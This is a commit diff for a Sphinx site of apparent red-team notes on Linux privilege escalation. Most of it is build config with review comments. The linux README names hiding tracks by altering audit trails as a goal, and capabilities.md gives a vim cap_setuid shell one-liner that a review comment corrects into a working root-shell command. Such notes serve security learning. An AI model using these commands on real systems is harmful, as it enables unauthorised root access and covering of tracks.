Initial commit
ninabarzh committed Sep 26, 2022
1 parent a6b8c93 commit d27ffca
Showing 23 changed files with 869 additions and 2 deletions.
28 changes: 28 additions & 0 deletions .github/workflows/documentation.yml
@@ -0,0 +1,28 @@
name: Publish Monkeys using Sphinx

on:
push:
branches:
- 'main'

jobs:
build-docs:
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v2
- uses: actions/setup-python@v3
- name: Install dependencies
run: |
pip install sphinx==5.1.0 sphinx_rtd_theme myst-parser sphinx-markdown-tables
- name: Build documentation
run: |
make html
- name: Deploy
uses: peaceiris/actions-gh-pages@v3
if: ${{ github.event_name == 'push' && github.ref == 'refs/heads/main' }}
with:
publish_branch: gh-pages
github_token: ${{ secrets.GITHUB_TOKEN }}
publish_dir: build/html/
force_orphan: true
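Review bot: the job has no `permissions:` block, so the `GITHUB_TOKEN` handed to `peaceiris/actions-gh-pages` in the Deploy step inherits the repository default instead of an explicit least-privilege scope; add `permissions: contents: write` at the `build-docs` job level so the token can push `gh-pages` and nothing more. The three actions are referenced by mutable major tags (`actions/checkout@v2`, `actions/setup-python@v3`, `peaceiris/actions-gh-pages@v3`); pinning each to a full commit SHA keeps a retagged or compromised release from running inside the publishing job. The `pip install` line pins only `sphinx==5.1.0` while `sphinx_rtd_theme`, `myst-parser` and `sphinx-markdown-tables` float, so the build picks up whatever is latest on PyPI at run time; pin them, or move them to a requirements file with hashes that the README can point at. Minor: the `if:` condition on the Deploy step restates the `on: push` / `branches: main` trigger and can go, and `force_orphan: true` rewrites `gh-pages` history on every run, which is fine for generated output but deserves a comment saying so.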
33 changes: 33 additions & 0 deletions .gitignore
@@ -0,0 +1,33 @@
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
*$py.class

# Mac custom attributes file (Desktop Service Store)
.DS_Store

# PyCharm files
.idea/

# Instance Folder - used for run-time files
instance/*.cfg
instance/*.db
instance/*.log
instance/*.log*

# Log Files
instance/logs/
*.log

# Coverage output
.coverage
htmlcov/

# Virtual Environment
/venv/

# pytest files
.pytest_cache/

# Not the static site, will be generated on push
build/
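Review bot: `instance/*.log` is redundant once `*.log` appears under the Log Files heading, since `*.log` matches at any depth; `instance/*.log*` is not redundant (it also catches rotated files such as `app.log.1`), so keep that one and drop the plain `instance/*.log`. The `instance/*.cfg` and `instance/*.db` patterns are the important ones here, as run-time config and databases are where credentials tend to land; a short comment saying they are excluded for that reason would make the intent survive the next edit.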
20 changes: 20 additions & 0 deletions Makefile
@@ -0,0 +1,20 @@
# Minimal makefile for Sphinx documentation
#

# You can set these variables from the command line, and also
# from the environment for the first two.
SPHINXOPTS ?=
SPHINXBUILD ?= sphinx-build
SOURCEDIR = source
BUILDDIR = build

# Put it first so that "make" without argument is like "make help".
help:
@$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)

.PHONY: help Makefile

# Catch-all target: route all unknown targets to Sphinx using the new
# "make mode" option. $(O) is meant as a shortcut for $(SPHINXOPTS).
%: Makefile
@$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
34 changes: 32 additions & 2 deletions README.md
@@ -1,2 +1,32 @@
# red-escalation
Privilege escalation
# Monkeys

![Publish Monkeys using Sphinx](https://github.com/tymyrddin/red-escalation/workflows/Publish%20Monkeys%20using%20Sphinx/badge.svg?branch=main)
Deployed: https://tymyrddin.github.io/red-escalation/

Built with [Sphinx](https://www.sphinx-doc.org) using a [theme](https://github.com/readthedocs/sphinx_rtd_theme) provided
by [Read the Docs](https://readthedocs.org/).

## Requirements

* sphinx — sphinx package
* sphinx-rtd-theme — a theme package
* myst-parser — parsing `.md` files
* sphinx-markdown-tables — package for Markdown tables support

## Usage

Add or change documents in the source folder.

Make the build:
```bash
$ make html
```

## Problems or Suggestions

This project welcomes contributions and suggestions.

[Open an issue here](https://github.com/tymyrddin/red-escalation/issues)

## Mind
Where you stand depends on where you sit, and all threats are cross-vector threats. Without a clear mandate for testing, measuring and reporting actual improvements in security, attempts at improving security makes absolutely no sense, not even for the low-hanging fruit.
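Review bot: the `bash` fence in the Usage section prefixes the command with a `$` prompt, so `$ make html` fails when pasted into a shell; drop the prompt. The Requirements list names packages without versions, while `.github/workflows/documentation.yml` pins `sphinx==5.1.0`; either state the versions here or reference a requirements file so local builds match CI. Grammar in the Mind paragraph: `attempts at improving security makes absolutely no sense` should read `make`. The `Deployed:` line carries a bare URL where the rest of the file uses Markdown links.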
35 changes: 35 additions & 0 deletions make.bat
@@ -0,0 +1,35 @@
@ECHO OFF

pushd %~dp0

REM Command file for Sphinx documentation

if "%SPHINXBUILD%" == "" (
set SPHINXBUILD=sphinx-build
)
set SOURCEDIR=source
set BUILDDIR=build

%SPHINXBUILD% >NUL 2>NUL
if errorlevel 9009 (
echo.
echo.The 'sphinx-build' command was not found. Make sure you have Sphinx
echo.installed, then set the SPHINXBUILD environment variable to point
echo.to the full path of the 'sphinx-build' executable. Alternatively you
echo.may add the Sphinx directory to PATH.
echo.
echo.If you don't have Sphinx installed, grab it from
echo.https://www.sphinx-doc.org/
exit /b 1
)

if "%1" == "" goto help

%SPHINXBUILD% -M %1 %SOURCEDIR% %BUILDDIR% %SPHINXOPTS% %O%
goto end

:help
%SPHINXBUILD% -M help %SOURCEDIR% %BUILDDIR% %SPHINXOPTS% %O%

:end
popd
36 changes: 36 additions & 0 deletions source/_static/css/custom.css
@@ -0,0 +1,36 @@
h1 {
color: #DD0000;
}

a {
color: #DD0000;
}

a:hover {
color: #FF0000;
}

.wy-nav .wy-menu-vertical header {
color: #DD0000
}

.wy-menu-vertical header, .wy-menu-vertical p.caption {
color: #DD0000;
}

.wy-side-nav-search {
background-color: #333333;
color: #fcfcfc;
}

.wy-side-nav-search input[type="text"] {
width: 100%;
border-radius: 0px;
padding: 6px 12px;
border-color: #DD0000;
}

.highlight {
background: #333;
color: #ddd;
}
4 changes: 4 additions & 0 deletions source/_templates/footer.html
@@ -0,0 +1,4 @@
{% extends "!footer.html" %}
{%- block contentinfo %}
<a href="https://uu.tymyrddin.dev">Unseen University</a>, 2022
{% endblock %}
99 changes: 99 additions & 0 deletions source/conf.py
@@ -0,0 +1,99 @@
# Configuration file for the Sphinx documentation builder.
#
# For the full list of built-in configuration values, see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html

# -- Project information -----------------------------------------------------
# https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information

project = 'Monkeys know what tree to climb'
copyright = '2022, Ty Myrddin'
author = 'Ty Myrddin'
release = '0.1'

# -- General configuration ---------------------------------------------------

# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'myst_parser',
'sphinx_markdown_tables',
'sphinx.ext.intersphinx',
]

source_suffix = ['.rst', '.md']

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = []


# -- Options for HTML output -------------------------------------------------

# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'

html_theme_options = {
'display_version': True,
'prev_next_buttons_location': 'bottom',
'style_external_links': True,
# Toc options
'collapse_navigation': False,
'sticky_navigation': False,
'navigation_depth': 3,
'includehidden': True,
'titles_only': False
}

html_title = "Monkeys know what tree to climb"
html_logo = "img/logo.png"
html_favicon = "img/favicon.ico"


# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']

# These paths are either relative to html_static_path
# or fully qualified paths (eg. https://...)
html_css_files = [
'css/custom.css',
]

# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
html_show_sphinx = False

# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
html_show_copyright = False


# Intersphinx
intersphinx_mapping = {
"attack-trees": ("https://tymyrddin.github.io/attack-trees/", None),
"cheatsheets": ("https://tymyrddin.github.io/cheatsheets/", None),
"e2ee-threat-model":("https://tymyrddin.github.io/e2ee-threat-model/", None),
"da-threat-model":("https://tymyrddin.github.io/da-threat-model/", None),
"se-threat-model":("https://tymyrddin.github.io/se-threat-model/", None),
"app-threat-model":("https://tymyrddin.github.io/app-threat-model/", None),
"cicd-threat-model":("https://tymyrddin.github.io/cicd-threat-model/", None),
"linux-pc-mitigations":("https://tymyrddin.github.io/linux-pc-mitigations/", None),
"linux-server-mitigations":("https://tymyrddin.github.io/linux-server-mitigations/", None),
"data-mitigations":("https://tymyrddin.github.io/data-mitigations/", None),
"webserver-mitigations":("https://tymyrddin.github.io/webserver-mitigations/", None),
"mailserver-mitigations":("https://tymyrddin.github.io/mailserver-mitigations/", None),
"network-mitigations":("https://tymyrddin.github.io/network-mitigations/", None),
"app-mitigations": ("https://tymyrddin.github.io/app-mitigations/", None),
"android-mitigations": ("https://tymyrddin.github.io/android-mitigations/", None),
"windows-pc-mitigations": ("https://tymyrddin.github.io/windows-pc-mitigations/", None),
"macos-mitigations": ("https://tymyrddin.github.io/macos-mitigations/", None),
"ios-mitigations": ("https://tymyrddin.github.io/ios-mitigations/", None),
}
myst_url_schemes = ["http", "https", ]
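Review bot: `intersphinx_mapping` lists seventeen remote inventories with `None` as the local fallback, so every CI build fetches `objects.inv` from seventeen GitHub Pages sites; any one being unreachable produces a warning, and the contents of those inventories decide where cross-references resolve, so the published site depends on what those hosts serve at build time. Consider setting `intersphinx_timeout`, vendoring each inventory as the second element of the tuple, or trimming the mapping to the projects this site actually cross-references. `html_logo = "img/logo.png"` and `html_favicon = "img/favicon.ico"` are resolved relative to `source/`; confirm both files are part of this commit, otherwise Sphinx only warns and the logo is silently omitted. Style: `myst_url_schemes = ["http", "https", ]` has a stray trailing comma and space.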
29 changes: 29 additions & 0 deletions source/docs/linux/README.md
@@ -0,0 +1,29 @@
# Introduction

## What?

There are many ways to escalate linux privileges. These are the most common methods based on common real-world
misconfigurations and flaws.

## Why?

Gain access to additional users, hosts, and resources, be able to take action, like install software, to get user
data that can possibly give access to even more sites or systems, destroy or alter audit trails to hide tracks of
having been there, etc.

## How?

* [Kernel vulnerability exploits](kernel.md)
* [Exploit sudo misconfigurations](sudo.md)
* [SUID and SGID exploits](suid.md)
* [Exploit capable programs](capabilities.md)
* [Cron jobs exploits](cron.md)
* [Path exploits](path.md)
* [NFS exploits](nfs.md)
* [Linux escalation resources](resources.md)






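Review bot: the hunk ends with six blank lines; trim to one. The bullet list links to `kernel.md`, `sudo.md`, `suid.md`, `cron.md`, `path.md`, `nfs.md` and `resources.md`; check that each target exists in this commit, because myst-parser emits a missing-reference warning per dangling link and `make html` does not fail on warnings unless `-W` is passed to `SPHINXOPTS`. Style: `linux` should be `Linux` in the What section, and the Why section is a sentence fragment (`Gain access to ...`) that reads better with a subject, e.g. `An attacker escalates to gain access to ...`.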
35 changes: 35 additions & 0 deletions source/docs/linux/capabilities.md
@@ -0,0 +1,35 @@
# Exploit capable programs

## Attack tree

```text
1 Become root on Linux via capabilities
1.1 Check for capable programs
1.2 Leverage program
```

## Example: vim

To check for capable programs, use the `getcap` tool:
```text
karen@target:~$ getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/home/karen/vim = cap_setuid+ep
/home/ubuntu/view = cap_setuid+ep
```

[Leverage vim](https://gtfobins.github.io/gtfobins/vim/) and execute a shell using python:

```text
vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
```

## Notes

Another method system administrators can use to increase the privilege level of a process or binary is by capabilities.
Capabilities help manage privileges at a more granular level. If a SOC analyst needs to use a tool that needs to
initiate socket connections, the capabilities of the binary can be changed such that it would get through its task
without needing a higher privilege user.
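Review bot: the vim one-liner in the Example section does not yield a root shell as written. `cap_setuid+ep` only permits the `setuid` system call; it does not change the process uid, so the Python snippet must call `os.setuid(0)` before `os.execl`, as the GTFOBins Capabilities entry for vim (not its plain Shell entry) does: `./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'`. It also has to invoke the capable copy by path (`/home/karen/vim` from the `getcap` output), since a bare `vim` resolves through PATH to `/usr/bin/vim`, which carries no capability. State as a precondition that the binary must be built with Python support (`vim --version | grep +python3`), otherwise `:py3` errors out. The Notes section explains what capabilities are but not what `+ep` in the listing means (the capability is in the effective and permitted sets, so it is active without the program asking for it); one sentence there makes the `getcap` output readable, and it is worth saying that `cap_setuid` is the entry to flag in that listing, as `cap_net_raw` and `cap_net_bind_service` on the other binaries do not lead to root.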